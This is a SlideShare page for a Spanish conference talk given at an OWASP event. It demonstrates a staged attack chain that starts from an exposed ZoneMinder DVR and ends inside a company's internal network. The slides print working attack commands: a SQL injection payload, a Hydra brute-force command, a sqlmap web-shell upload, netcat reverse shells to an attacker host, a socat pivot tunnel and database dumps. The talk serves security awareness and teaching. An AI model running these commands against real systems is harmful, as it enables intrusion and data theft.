SlideShare una empresa de Scribd logo

Desde el DVR hasta la cocina

Descargar como PPTX, PDF
Efren Diaz Gomez
Efren Diaz Gomez

Presentación de Daniel Fernandez Rodriguez y Efrén Díaz Gómez en el primer evento de OWASP Islas Canarias

Software
1 de 50
Desde el DVR hasta la cocina Daniel Fernandez Rodriguez Efrén Díaz Gomez
Daniel Fernandez Rodriguez Senior Cyber Security Architect @dj_thd https://www.linkedin.com/in/dfrtenerife/ Efrén Díaz Gomez IT Security Analyst @elefr3n https://www.linkedin.com/in/efren-diaz-gomez/
¿A quién interpretamos? Dos hackers que se venden al mejor postor ¿Quién es el cliente? El dueño de una empresa de desarrollo de software ¿El objetivo? Una empresa de su competencia ¿Qué tenemos? 87.113.6.72
Comenzamos con un Nmap y encontramos dos puertos abierto con http
Accedemos a la IP por el 80 y nos encontramos con un firewall
Accedemos a la IP por el 8080 y nos encontramos con un login
Buscamos en Google...
Vemos que se trata de un sistema de DVR open source
Buscamos CVE...
Nos centraremos en este, es reciente y de una alta gravedad
Example Url:http://target.com/zm/index.php Parameter: limit (POST) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: view=request&request=log&task=query&limit=100;(SQLI)OQkj)#&minTime=1466674406.084 434 Datos de la inyeción SQL:
Payload: view=request&request=log&task=query&limit=100;(SQLI)#&minTime=1466674406.084434 Parece que el CVE esta mal, y se trata de una vulnerabilidad estando autenticado, necesitaremos conseguir credenciales de acceso para poder explotarla...
THC Hydra Optamos por hacer un ataque de fuerza bruta con Hydra
Hydra 87.113.6.72 -S 8080 -L users.txt -P passwords.txt http-post-form "/zm/index.php:action=login&view=postlogin&postLoginQuery=&username=^USER^&password=^PASS^:postLoginQuery" Elaboramos el comando con los parámetros correctos tras ver el formulario
Conseguimos unas credenciales para acceder al DVR
Ya estamos dentro, vamos a echar un vistazo a las cámaras
Ya estamos dentro, vamos a echar un vistazo a las cámaras
Ya estamos dentro, vamos a echar un vistazo a las cámaras
Una vez autenticados volvemos a probar la inyeccion pasando la cookie de session al sqlmap y vemos que ya tenemos inyección, y además que el servicio mysql esta con root !
Nos fijamos en una tabla llamada Logs donde encontramos el path /usr/share/zoneminder/www/
Ahora que tenemos el path, y que siendo root el mysql puede escribir ficheros, vamos a subir un script en PHP con el que poder ejecutar comandos. Lo haremos añadiendo al sqlmap los parametros: --file-write shell.php ←Nuestro archivo local --file-dest /usr/share/zoneminder/www/cmd.php ←Ruta donde lo queremos subir en la máquina
Ya tenemos ejecución de comandos en la máquina del DVR
Vamos a por el reverse shell !
Vamos a por el reverse shell ! http://87.113.6.72:8080/zm/cmd.php?command=nc -e /bin/sh 10.18.0.8 1337
Vamos a por el reverse shell ! http://87.113.6.72:8080/zm/cmd.php?command=nc -e /bin/sh 10.18.0.8 1337
Vamos a por el reverse shell ! http://87.113.6.72:8080/zm/cmd.php?command=nc -e /bin/sh 10.18.0.8 1337
Ahora que estamos dentro del DVR comenzamos analizando la red
Realizamos un escaneo a la red con Nmap
Vemos que la máquina 192.168.1.3 parece interesante debido a su hostname y que tiene el puerto 80 abierto, lo que parece ser una aplicación web de gestión interna. Tenemos el problema de que como solo esta abierto hacia fuera el DVR no podemos acceder via http a esta máquina, ahora vamos a crear un tunel con socat para poder acceder via http a esta máquina desde fuera saltándonos el firewall.
Lanzamos en nuestra máquina un socat escuchando el puerto 1338 # socat tcp-listen:1338,reuseaddr,fork tcp-listen:8001,reuseaddr,retry=1 Lanzamos en el DVR un socat desde el CRM a nuestra máquina: # socat -t1 tcp:192.168.1.3:80,forever,intervall=1,fork tcp:109.51.56.213:1338
http://localhost:800 1 Ya tenemos acceso al CRM de la intranet, vemos que se trata de un Sugar CRM
Desconocemos la versión del CRM y buscando CVE vemos que no hay ninguno desde 2011. Vamos a sacar usuarios del DVR y ver si alguno coincide las credenciales con las del CRM.
Volvemos a la base de datos del DVR, y sacamos los posibles usuarios y hashes....
Conseguimos acceso: kazjur @ Zs2CTW
Nos dirijimos a la página de “About” y obtenemos la versión, la cual es 6.5.18
Buscamos en google y encontramos una vulnerabilidad que no tiene CVE registrado
La probamos y funciona perfecto, aquí tenemos toda la información del phpinfo()
Ahora haremos una reverse shell desde la máquina del CRM hacia nuestra máquina. system('nc -e /bin/sh [IP] [PORT]') Parece que de momento no tenemos ningún exploit para el kernel
Listamos los archivos y nos centramos en el config.php
Ahora vamos a conectarnos al MySQL a ver que hay...
Para poder usar el cliente mysql necesitamos una shell interactiva. Primero cargamos el /bin/bash con python: python -c "import pty; pty.spawn('/bin/bash')" Dejamos la reverse shell en segundo plano_ ctrl+z Y por ultimo ejecutamos: stty -icanon -echo -isig && fg; stty sane
Conectamos al MySQL Echamos un ojo a las bases de datos
Hacemos un dump con todas las bases de datos...
Hacemos un dump con todas las bases de datos...
Conclusión En esta exposición hemos dejado claro lo peligroso que puede ser dejar un dispositivo IoT abierto al exterior, y como desde el y con una serie de vulnerabilidades y faltas de politicas de seguridad en una empresa hemos podido acceder internamente a la red y además pivotar entre maquinas y acabar robando todo tipo de datos. Tambien cabe decir que mientras hemos preparado esta exposición nos hemos topado con una serie de vulnerabilidades en el Zoneminder que aún no hemos publicado y por tanto son 0-days, y de las cuales una de ellas se ha utilizado en la presente demostración. Estos son los tipos de vulnerabilidades encontradas: -Inyección SQL -Authentication Bypass -Remote Command Execution
-FIN- Gracias por vuestra atención y asistencia

Recomendados

Workshop Seguridad Wireless
Workshop Seguridad WirelessWorkshop Seguridad Wireless
Workshop Seguridad WirelessJaime Restrepo
 
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingConferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingHacking Bolivia
 
Pentesting Basico
Pentesting BasicoPentesting Basico
Pentesting BasicoCuauhtémoc García Somera
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasRafael Seg
 
Como usar Aircrack
Como usar AircrackComo usar Aircrack
Como usar AircrackAlfredo Fiebig
 
Criptografia
CriptografiaCriptografia
Criptografiajavipiris
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una BackdoorNEGOCIOS PROPIOS
 
Anonimo el libro hacker
Anonimo el libro hackerAnonimo el libro hacker
Anonimo el libro hackerGabriel Moreno Cordero Jr.
 

Recomendados

Workshop Seguridad Wireless
Workshop Seguridad WirelessWorkshop Seguridad Wireless
Workshop Seguridad WirelessJaime Restrepo
 
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingConferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingHacking Bolivia
 
Pentesting Basico
Pentesting BasicoPentesting Basico
Pentesting BasicoCuauhtémoc García Somera
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasRafael Seg
 
Como usar Aircrack
Como usar AircrackComo usar Aircrack
Como usar AircrackAlfredo Fiebig
 
Criptografia
CriptografiaCriptografia
Criptografiajavipiris
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una BackdoorNEGOCIOS PROPIOS
 
Anonimo el libro hacker
Anonimo el libro hackerAnonimo el libro hacker
Anonimo el libro hackerGabriel Moreno Cordero Jr.
 
Thunder cache 3.1.2 en centos 6.3
Thunder cache 3.1.2 en centos 6.3Thunder cache 3.1.2 en centos 6.3
Thunder cache 3.1.2 en centos 6.3Loquenecesito,com
 
PHPVigo #17 - lightning password hash
PHPVigo #17 - lightning password hashPHPVigo #17 - lightning password hash
PHPVigo #17 - lightning password hashRolando Caldas
 
Manual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAManual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAPaulo Colomés
 
Seguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticasSeguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticasLucy Tomas
 
Reventando WordPress
Reventando WordPressReventando WordPress
Reventando WordPressToni Escamilla Pardo
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02Tensor
 
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...RootedCON
 
Fail2 ban
Fail2 banFail2 ban
Fail2 banyaneli14
 
Fail2 ban
Fail2 banFail2 ban
Fail2 banyaneli14
 
Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019
Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019
Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019Javier García Antón
 
Openssl
OpensslOpenssl
Opensslguest1f8a3a
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRootedCON
 
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]RootedCON
 
El caso de la habitacion 1020
El caso de la habitacion 1020El caso de la habitacion 1020
El caso de la habitacion 1020Agustin Mattioli
 
Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linuxNick Carter
 
Ethical hacking 04a
Ethical hacking 04aEthical hacking 04a
Ethical hacking 04aTensor
 
criptografiaV1
criptografiaV1criptografiaV1
criptografiaV1Leroy Merlin Tarragona
 
La maquina virtual_paralela_pvm
La maquina virtual_paralela_pvmLa maquina virtual_paralela_pvm
La maquina virtual_paralela_pvmingdianabaquero
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Lo que será windows 8
Lo que será windows 8Lo que será windows 8
Lo que será windows 8Eventos Creativos
 
Present3
Present3Present3
Present3Rafael Cornejo Martinez
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Telefónica
 

Más contenido relacionado

La actualidad más candente

Thunder cache 3.1.2 en centos 6.3
Thunder cache 3.1.2 en centos 6.3Thunder cache 3.1.2 en centos 6.3
Thunder cache 3.1.2 en centos 6.3Loquenecesito,com
 
PHPVigo #17 - lightning password hash
PHPVigo #17 - lightning password hashPHPVigo #17 - lightning password hash
PHPVigo #17 - lightning password hashRolando Caldas
 
Manual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAManual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAPaulo Colomés
 
Seguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticasSeguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticasLucy Tomas
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02Tensor
 
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...RootedCON
 
Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019
Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019
Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019Javier García Antón
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRootedCON
 
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]RootedCON
 
El caso de la habitacion 1020
El caso de la habitacion 1020El caso de la habitacion 1020
El caso de la habitacion 1020Agustin Mattioli
 
Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linuxNick Carter
 
Ethical hacking 04a
Ethical hacking 04aEthical hacking 04a
Ethical hacking 04aTensor
 
La maquina virtual_paralela_pvm
La maquina virtual_paralela_pvmLa maquina virtual_paralela_pvm
La maquina virtual_paralela_pvmingdianabaquero
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 

La actualidad más candente (20)

Thunder cache 3.1.2 en centos 6.3
Thunder cache 3.1.2 en centos 6.3Thunder cache 3.1.2 en centos 6.3
Thunder cache 3.1.2 en centos 6.3
 
PHPVigo #17 - lightning password hash
PHPVigo #17 - lightning password hashPHPVigo #17 - lightning password hash
PHPVigo #17 - lightning password hash
 
Manual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAManual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPA
 
Seguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticasSeguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticas
 
Reventando WordPress
Reventando WordPressReventando WordPress
Reventando WordPress
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
 
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
 
Fail2 ban
Fail2 banFail2 ban
Fail2 ban
 
Fail2 ban
Fail2 banFail2 ban
Fail2 ban
 
Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019
Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019
Hack Like a Pro With Custom VPS - Taller Navaja Negra 2019
 
Openssl
OpensslOpenssl
Openssl
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
 
El caso de la habitacion 1020
El caso de la habitacion 1020El caso de la habitacion 1020
El caso de la habitacion 1020
 
Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linux
 
Ethical hacking 04a
Ethical hacking 04aEthical hacking 04a
Ethical hacking 04a
 
criptografiaV1
criptografiaV1criptografiaV1
criptografiaV1
 
La maquina virtual_paralela_pvm
La maquina virtual_paralela_pvmLa maquina virtual_paralela_pvm
La maquina virtual_paralela_pvm
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Lo que será windows 8
Lo que será windows 8Lo que será windows 8
Lo que será windows 8
 

Similar a Desde el DVR hasta la cocina

Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Telefónica
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry PiServicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry PiTelefónica
 
Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploitDaniel
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLEdson Ortega
 
SecAdmin 2017: Hacking con Python
SecAdmin 2017: Hacking con PythonSecAdmin 2017: Hacking con Python
SecAdmin 2017: Hacking con PythonDani Adastra
 
Maitaining access
Maitaining accessMaitaining access
Maitaining accessTensor
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESSTensor
 
Uso del troyano cybergate ok
Uso del troyano cybergate okUso del troyano cybergate ok
Uso del troyano cybergate okTensor
 
Php01 instalacion de apache y php en linux
Php01 instalacion de apache y php en linuxPhp01 instalacion de apache y php en linux
Php01 instalacion de apache y php en linuxJulio Pari
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Brat Stell
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentestingakencito
 
Integración LDAP + SAMBA
Integración LDAP + SAMBAIntegración LDAP + SAMBA
Integración LDAP + SAMBAcyberleon95
 
Lab 3 cifrado criptografia
Lab 3 cifrado criptografiaLab 3 cifrado criptografia
Lab 3 cifrado criptografiaJosé Moreno
 
Administración de switches
Administración de switchesAdministración de switches
Administración de switchesRaul Lozada
 
Smtp 2950
Smtp 2950Smtp 2950
Smtp 29501 2d
 

Similar a Desde el DVR hasta la cocina (20)

Present3
Present3Present3
Present3
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry PiServicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
 
Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploit
 
Manual de uso_de_squid
Manual de uso_de_squidManual de uso_de_squid
Manual de uso_de_squid
 
Bash Ransomware
Bash RansomwareBash Ransomware
Bash Ransomware
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSL
 
SecAdmin 2017: Hacking con Python
SecAdmin 2017: Hacking con PythonSecAdmin 2017: Hacking con Python
SecAdmin 2017: Hacking con Python
 
Maitaining access
Maitaining accessMaitaining access
Maitaining access
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
 
Uso del troyano cybergate ok
Uso del troyano cybergate okUso del troyano cybergate ok
Uso del troyano cybergate ok
 
Php01 instalacion de apache y php en linux
Php01 instalacion de apache y php en linuxPhp01 instalacion de apache y php en linux
Php01 instalacion de apache y php en linux
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentesting
 
Integración LDAP + SAMBA
Integración LDAP + SAMBAIntegración LDAP + SAMBA
Integración LDAP + SAMBA
 
Desencriptar claves wap
Desencriptar claves wapDesencriptar claves wap
Desencriptar claves wap
 
Lab 3 cifrado criptografia
Lab 3 cifrado criptografiaLab 3 cifrado criptografia
Lab 3 cifrado criptografia
 
Administración de switches
Administración de switchesAdministración de switches
Administración de switches
 
Smtp 2950
Smtp 2950Smtp 2950
Smtp 2950
 

Desde el DVR hasta la cocina

  • 1. Desde el DVR hasta la cocina Daniel Fernandez Rodriguez Efrén Díaz Gomez
  • 2. Daniel Fernandez Rodriguez Senior Cyber Security Architect @dj_thd https://www.linkedin.com/in/dfrtenerife/ Efrén Díaz Gomez IT Security Analyst @elefr3n https://www.linkedin.com/in/efren-diaz-gomez/
  • 3. ¿A quién interpretamos? Dos hackers que se venden al mejor postor ¿Quién es el cliente? El dueño de una empresa de desarrollo de software ¿El objetivo? Una empresa de su competencia ¿Qué tenemos? 87.113.6.72
  • 4. Comenzamos con un Nmap y encontramos dos puertos abierto con http
  • 5. Accedemos a la IP por el 80 y nos encontramos con un firewall
  • 6. Accedemos a la IP por el 8080 y nos encontramos con un login
  • 8. Vemos que se trata de un sistema de DVR open source
  • 10. Nos centraremos en este, es reciente y de una alta gravedad
  • 11. Example Url:http://target.com/zm/index.php Parameter: limit (POST) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: view=request&request=log&task=query&limit=100;(SQLI)OQkj)#&minTime=1466674406.084 434 Datos de la inyeción SQL:
  • 12.
  • 13.
  • 14. Payload: view=request&request=log&task=query&limit=100;(SQLI)#&minTime=1466674406.084434 Parece que el CVE esta mal, y se trata de una vulnerabilidad estando autenticado, necesitaremos conseguir credenciales de acceso para poder explotarla...
  • 15. THC Hydra Optamos por hacer un ataque de fuerza bruta con Hydra
  • 16. Hydra 87.113.6.72 -S 8080 -L users.txt -P passwords.txt http-post-form "/zm/index.php:action=login&view=postlogin&postLoginQuery=&username=^USER^&password=^PASS^:postLoginQuery" Elaboramos el comando con los parámetros correctos tras ver el formulario
  • 17. Conseguimos unas credenciales para acceder al DVR
  • 18. Ya estamos dentro, vamos a echar un vistazo a las cámaras
  • 19. Ya estamos dentro, vamos a echar un vistazo a las cámaras
  • 20. Ya estamos dentro, vamos a echar un vistazo a las cámaras
  • 21. Una vez autenticados volvemos a probar la inyeccion pasando la cookie de session al sqlmap y vemos que ya tenemos inyección, y además que el servicio mysql esta con root !
  • 22. Nos fijamos en una tabla llamada Logs donde encontramos el path /usr/share/zoneminder/www/
  • 23. Ahora que tenemos el path, y que siendo root el mysql puede escribir ficheros, vamos a subir un script en PHP con el que poder ejecutar comandos. Lo haremos añadiendo al sqlmap los parametros: --file-write shell.php ←Nuestro archivo local --file-dest /usr/share/zoneminder/www/cmd.php ←Ruta donde lo queremos subir en la máquina
  • 24. Ya tenemos ejecución de comandos en la máquina del DVR
  • 25. Vamos a por el reverse shell !
  • 26. Vamos a por el reverse shell ! http://87.113.6.72:8080/zm/cmd.php?command=nc -e /bin/sh 10.18.0.8 1337
  • 27. Vamos a por el reverse shell ! http://87.113.6.72:8080/zm/cmd.php?command=nc -e /bin/sh 10.18.0.8 1337
  • 28. Vamos a por el reverse shell ! http://87.113.6.72:8080/zm/cmd.php?command=nc -e /bin/sh 10.18.0.8 1337
  • 29. Ahora que estamos dentro del DVR comenzamos analizando la red
  • 30. Realizamos un escaneo a la red con Nmap
  • 31.
  • 32. Vemos que la máquina 192.168.1.3 parece interesante debido a su hostname y que tiene el puerto 80 abierto, lo que parece ser una aplicación web de gestión interna. Tenemos el problema de que como solo esta abierto hacia fuera el DVR no podemos acceder via http a esta máquina, ahora vamos a crear un tunel con socat para poder acceder via http a esta máquina desde fuera saltándonos el firewall.
  • 33. Lanzamos en nuestra máquina un socat escuchando el puerto 1338 # socat tcp-listen:1338,reuseaddr,fork tcp-listen:8001,reuseaddr,retry=1 Lanzamos en el DVR un socat desde el CRM a nuestra máquina: # socat -t1 tcp:192.168.1.3:80,forever,intervall=1,fork tcp:109.51.56.213:1338
  • 34.
  • 35. http://localhost:800 1 Ya tenemos acceso al CRM de la intranet, vemos que se trata de un Sugar CRM
  • 36. Desconocemos la versión del CRM y buscando CVE vemos que no hay ninguno desde 2011. Vamos a sacar usuarios del DVR y ver si alguno coincide las credenciales con las del CRM.
  • 37. Volvemos a la base de datos del DVR, y sacamos los posibles usuarios y hashes....
  • 39. Nos dirijimos a la página de “About” y obtenemos la versión, la cual es 6.5.18
  • 40. Buscamos en google y encontramos una vulnerabilidad que no tiene CVE registrado
  • 41. La probamos y funciona perfecto, aquí tenemos toda la información del phpinfo()
  • 42. Ahora haremos una reverse shell desde la máquina del CRM hacia nuestra máquina. system('nc -e /bin/sh [IP] [PORT]') Parece que de momento no tenemos ningún exploit para el kernel
  • 43. Listamos los archivos y nos centramos en el config.php
  • 44. Ahora vamos a conectarnos al MySQL a ver que hay...
  • 45. Para poder usar el cliente mysql necesitamos una shell interactiva. Primero cargamos el /bin/bash con python: python -c "import pty; pty.spawn('/bin/bash')" Dejamos la reverse shell en segundo plano_ ctrl+z Y por ultimo ejecutamos: stty -icanon -echo -isig && fg; stty sane
  • 46. Conectamos al MySQL Echamos un ojo a las bases de datos
  • 47. Hacemos un dump con todas las bases de datos...
  • 48. Hacemos un dump con todas las bases de datos...
  • 49. Conclusión En esta exposición hemos dejado claro lo peligroso que puede ser dejar un dispositivo IoT abierto al exterior, y como desde el y con una serie de vulnerabilidades y faltas de politicas de seguridad en una empresa hemos podido acceder internamente a la red y además pivotar entre maquinas y acabar robando todo tipo de datos. Tambien cabe decir que mientras hemos preparado esta exposición nos hemos topado con una serie de vulnerabilidades en el Zoneminder que aún no hemos publicado y por tanto son 0-days, y de las cuales una de ellas se ha utilizado en la presente demostración. Estos son los tipos de vulnerabilidades encontradas: -Inyección SQL -Authentication Bypass -Remote Command Execution
  • 50. -FIN- Gracias por vuestra atención y asistencia